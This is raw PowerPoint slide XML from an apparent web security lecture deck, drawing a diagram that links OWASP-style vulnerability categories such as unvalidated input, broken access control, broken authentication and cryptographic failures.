            <a:off x="3695400" y="4227121"/>
            <a:ext cx="171720" cy="1159379"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector2">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="57150">
            <a:solidFill>
              <a:srgbClr val="CCCCCC"/>
            </a:solidFill>
            <a:round/>
            <a:tailEnd type="none" w="sm" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1256" name="Connector: Curved 79">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B0F1BDCA-35A7-C9AB-A91B-E6DEFD14A40F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="1230" idx="3"/>
            <a:endCxn id="1226" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="3695400" y="4406220"/>
            <a:ext cx="343440" cy="48564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4" name="Connector: Curved 99">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E28902B4-AA5A-6E1B-1E15-572F902537E9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="1211" idx="3"/>
            <a:endCxn id="1216" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4966560" y="2917980"/>
            <a:ext cx="35928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59" name="Connector: Curved 110">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EEE62061-F777-7EF6-7CA1-9C7C51493B48}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="1219" idx="3"/>
            <a:endCxn id="1245" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="3695400" y="3414060"/>
            <a:ext cx="342720" cy="488520"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
            </a:avLst>
          </a:prstGeom>
          <a:ln w="57150">
            <a:solidFill>
              <a:srgbClr val="808080">
                <a:lumMod val="40000"/>
                <a:lumOff val="60000"/>
              </a:srgbClr>
            </a:solidFill>
            <a:round/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="TextBox 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{14D98541-042B-E302-6DC9-57BDAA6B7E92}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3695400" y="338931"/>
            <a:ext cx="2658205" cy="521766"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFE57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GB" sz="2800" b="0" strike="noStrike" spc="-1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial Rounded MT Bold"/>
                <a:ea typeface="DejaVu Sans"/>
              </a:rPr>
              <a:t>input handling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304" name="Connector: Curved 146">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F382D8F5-FF4B-B28E-6859-A6B1A90976CD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="1243" idx="3"/>
            <a:endCxn id="1292" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="7517880" y="1429380"/>
            <a:ext cx="364320" cy="4465440"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 33807"/>
            </a:avLst>
          </a:prstGeom>
          <a:ln w="57150">
            <a:solidFill>
              <a:srgbClr val="FFE575"/>
            </a:solidFill>
            <a:round/>
            <a:tailEnd type="triangle" w="sm" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1251" name="Connector: Curved 74">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C0095B7B-C4F9-F872-C75F-D8F05572CD24}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="1225" idx="3"/>
            <a:endCxn id="1207" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="6251760" y="2421540"/>
            <a:ext cx="341640" cy="1984680"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
            </a:avLst>
          </a:prstGeom>
          <a:ln w="57150">
            <a:solidFill>
              <a:srgbClr val="FFE575"/>
            </a:solidFill>
            <a:round/>
            <a:tailEnd type="triangle" w="sm" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1280" name="Connector: Curved 105">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D7283DFE-85DC-1F93-78AF-9B36D49220B9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="1215" idx="3"/>
            <a:endCxn id="1311" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3695400" y="3407940"/>
            <a:ext cx="343440" cy="1494720"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
            </a:avLst>
          </a:prstGeom>
          <a:ln w="57150">
            <a:solidFill>
              <a:schemeClr val="bg1">
                <a:lumMod val="85000"/>
              </a:schemeClr>
            </a:solidFill>
            <a:round/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1286" name="Connector: Curved 111">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AE6611C6-DFEC-033F-4376-FAD263556766}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="1311" idx="3"/>
            <a:endCxn id="1216" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="4966560" y="3414060"/>
            <a:ext cx="359280" cy="1488600"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
            </a:avLst>
          </a:prstGeom>
          <a:ln w="57150">
            <a:solidFill>
              <a:schemeClr val="bg1">
                <a:lumMod val="85000"/>
              </a:schemeClr>
            </a:solidFill>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1250" name="Connector: Curved 73">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{57E6ED7B-DFEF-B27D-62E5-3DACE08A9744}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="1206" idx="3"/>
            <a:endCxn id="1225" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4966560" y="2421360"/>
            <a:ext cx="359640" cy="1985040"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector5">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50100"/>
              <a:gd name="adj2" fmla="val 50009"/>
              <a:gd name="adj3" fmla="val 49899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sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FA45B5AF-EAB8-03BD-842D-3EF89FD41B0D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="285343">
            <a:off x="553204" y="3051744"/>
            <a:ext cx="758001" cy="255221"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="1905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algn="ctr" defTabSz="492120">
              <a:lnSpc>
                <a:spcPct val="116000"/>
              </a:lnSpc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C00000"/>
                </a:solidFill>
                <a:latin typeface="Stencil"/>
                <a:ea typeface="DejaVu Sans"/>
              </a:rPr>
              <a:t>solved?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1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2CA7537-7B73-8D1C-37BC-408036E5C3E6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="285343">
            <a:off x="616727" y="1072783"/>
            <a:ext cx="758001" cy="255221"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="1905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algn="ctr" defTabSz="492120">
              <a:lnSpc>
                <a:spcPct val="116000"/>
              </a:lnSpc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C00000"/>
                </a:solidFill>
                <a:latin typeface="Stencil"/>
                <a:ea typeface="DejaVu Sans"/>
              </a:rPr>
              <a:t>solved?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1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" name="Picture 2" descr="A red starburst with white text&#10;&#10;AI-generated content may be incorrect.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3020AA7B-E6C0-C8AE-E068-2A3C7244F05B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm rot="2831106">
            <a:off x="6033105" y="4610560"/>
            <a:ext cx="337199" cy="351142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" name="Picture 2" descr="A red starburst with white text&#10;&#10;AI-generated content may be incorrect.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{17D94751-A90F-55C2-59F3-2345B5EA404E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm rot="2831106">
            <a:off x="5976978" y="2608937"/>
            <a:ext cx="337199" cy="351142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" name="Picture 2" descr="A red starburst with white text&#10;&#10;AI-generated content may be incorrect.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{26E564DD-0DCF-EC1D-33B6-2953BF746843}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm rot="2831106">
            <a:off x="7286985" y="5604276"/>
            <a:ext cx="337199" cy="351142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>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{59B3C403-B33B-1882-20A3-E4DE8DAC7E1F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="546863" y="319860"/>
            <a:ext cx="3738914" cy="5599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46040">
              <a:lnSpc>
                <a:spcPct val="116000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" spc="-1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C5000B"/>
                </a:solidFill>
                <a:latin typeface="Arial Rounded MT Bold"/>
              </a:rPr>
              <a:t>All issues due to </a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="2400" spc="-1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="13" name="Connector: Curved 77">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0046DE7F-E329-062C-62FE-79F9D11FBAC1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="2420280" y="1419840"/>
            <a:ext cx="349560" cy="505440"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
            </a:avLst>
          </a:prstGeom>
          <a:ln w="57150">
            <a:solidFill>
              <a:srgbClr val="FFE575"/>
            </a:solidFill>
            <a:round/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="15" name="Connector: Curved 81">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E6278AC4-CEDD-7096-B310-6FD205068EAB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1163880" y="1925460"/>
            <a:ext cx="321480" cy="3969360"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 24322"/>
            </a:avLst>
          </a:prstGeom>
          <a:ln w="57150">
            <a:solidFill>
              <a:schemeClr val="bg2">
                <a:lumMod val="40000"/>
                <a:lumOff val="60000"/>
              </a:schemeClr>
            </a:solidFill>
            <a:round/>
            <a:tailEnd type="triangle" w="sm" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="13825406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995C2-8ACF-049B-BAA2-25B2B9FC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or: Curved 82">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{470D973E-CC4D-D430-8166-D952FF1A1ACF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1163700" y="2442754"/>
            <a:ext cx="321120" cy="987840"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
            </a:avLst>
          </a:prstGeom>
          <a:ln w="57150">
            <a:solidFill>
              <a:schemeClr val="bg2">
                <a:lumMod val="40000"/>
                <a:lumOff val="60000"/>
              </a:schemeClr>
            </a:solidFill>
            <a:round/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1291" name="Connector: Curved 116">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A4F68543-27A2-B8CC-BC0C-96993228ADE0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="1242" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="4966560" y="4163445"/>
            <a:ext cx="179640" cy="1731375"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector2">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="57150">
            <a:solidFill>
              <a:srgbClr val="71C036"/>
            </a:solidFill>
            <a:round/>
            <a:tailEnd type="none" w="med" len="sm"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1187" name="PlaceHolder 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1ABBC459-E440-01CA-2534-B0FF65AEC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80" y="279720"/>
            <a:ext cx="8224560" cy="80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algn="ctr" defTabSz="446040">
              <a:lnSpc>
                <a:spcPct val="116000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="0" strike="noStrike" spc="-1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C5000B"/>
                </a:solidFill>
                <a:latin typeface="Arial Rounded MT Bold"/>
                <a:ea typeface="DejaVu Sans"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="2400" b="0" strike="noStrike" spc="-1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1188" name="PlaceHolder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FE49DB1A-FFB0-3964-07A3-0E08A348946E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" idx="73"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7884360" y="6211440"/>
            <a:ext cx="775080" cy="469440"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9360">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" numCol="1" spcCol="0" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr indent="0" algn="r" defTabSz="457200">
              <a:lnSpc>
                <a:spcPct val="116000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:defRPr lang="en-US" sz="1200" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial Rounded MT Bold"/>
                <a:ea typeface="DejaVu Sans"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr indent="0" algn="r" defTabSz="457200">
              <a:lnSpc>
                <a:spcPct val="116000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:fld id="{E01EDF43-9989-4485-A3FE-CFD0EC2751AF}" type="slidenum">
              <a:rPr lang="en-US" sz="1200" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial Rounded MT Bold"/>
                <a:ea typeface="DejaVu Sans"/>
              </a:rPr>
              <a:t>55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0" name="CustomShape 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F3462FAE-4E2C-1304-A0DE-2448AA635B8A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="238680" y="122004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Unvalidated Input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191" name="CustomShape 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{53679A59-7800-47ED-1790-63E72B2563F5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1485360" y="122004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2" name="CustomShape 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CDB12DF6-52DB-5FB5-D739-061D87FACA4B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2765880" y="122004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193" name="CustomShape 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D44C3268-3DE7-2E39-93CE-C9C83057AEF5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5325840" y="122004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194" name="CustomShape 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{78FF7F23-6E3D-14A1-74F2-9576FD80DA88}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4038840" y="122004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195" name="CustomShape 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EF8F1BE4-B21D-3DA7-4A22-EA0C9748F90F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6593400" y="1220040"/>
            <a:ext cx="924480" cy="418680"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="92D050"/>
          </a:solidFill>
          <a:ln w="9360">
            <a:solidFill>
              <a:srgbClr val="92D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pc="-1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial Narrow"/>
              </a:rPr>
              <a:t>Broken</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" spc="-1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial Narrow"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" spc="-1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial Narrow"/>
              </a:rPr>
              <a:t>Access Control</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" spc="-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1196" name="CustomShape 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F1E82204-BC0D-7228-3F66-620FFAB205CB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="226080" y="1716120"/>
            <a:ext cx="93780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Broken Access Control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97" name="CustomShape 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BD03EBD8-A269-C75D-E277-F36599062BC6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1485000" y="171468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198" name="CustomShape 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E7D8D00A-05EE-54D2-D27E-881939C26775}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2765880" y="171468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199" name="CustomShape 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{783A1202-585F-D9DF-F534-7785689E32E1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5325840" y="1716120"/>
            <a:ext cx="9259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Broken Authentication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0" name="CustomShape 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{767A1310-BA92-5C1B-1F12-3D72752C4F9B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4038840" y="1716120"/>
            <a:ext cx="9277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Broken Auth. &amp; Session Mngt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1" name="CustomShape 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0FA99164-68E6-643A-DD38-597B7268220B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6593400" y="171612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Cryptographic Failures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02" name="CustomShape 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5021C275-22B9-1CFC-FC2E-6619CAE2FF92}"/>
              </a:ext>
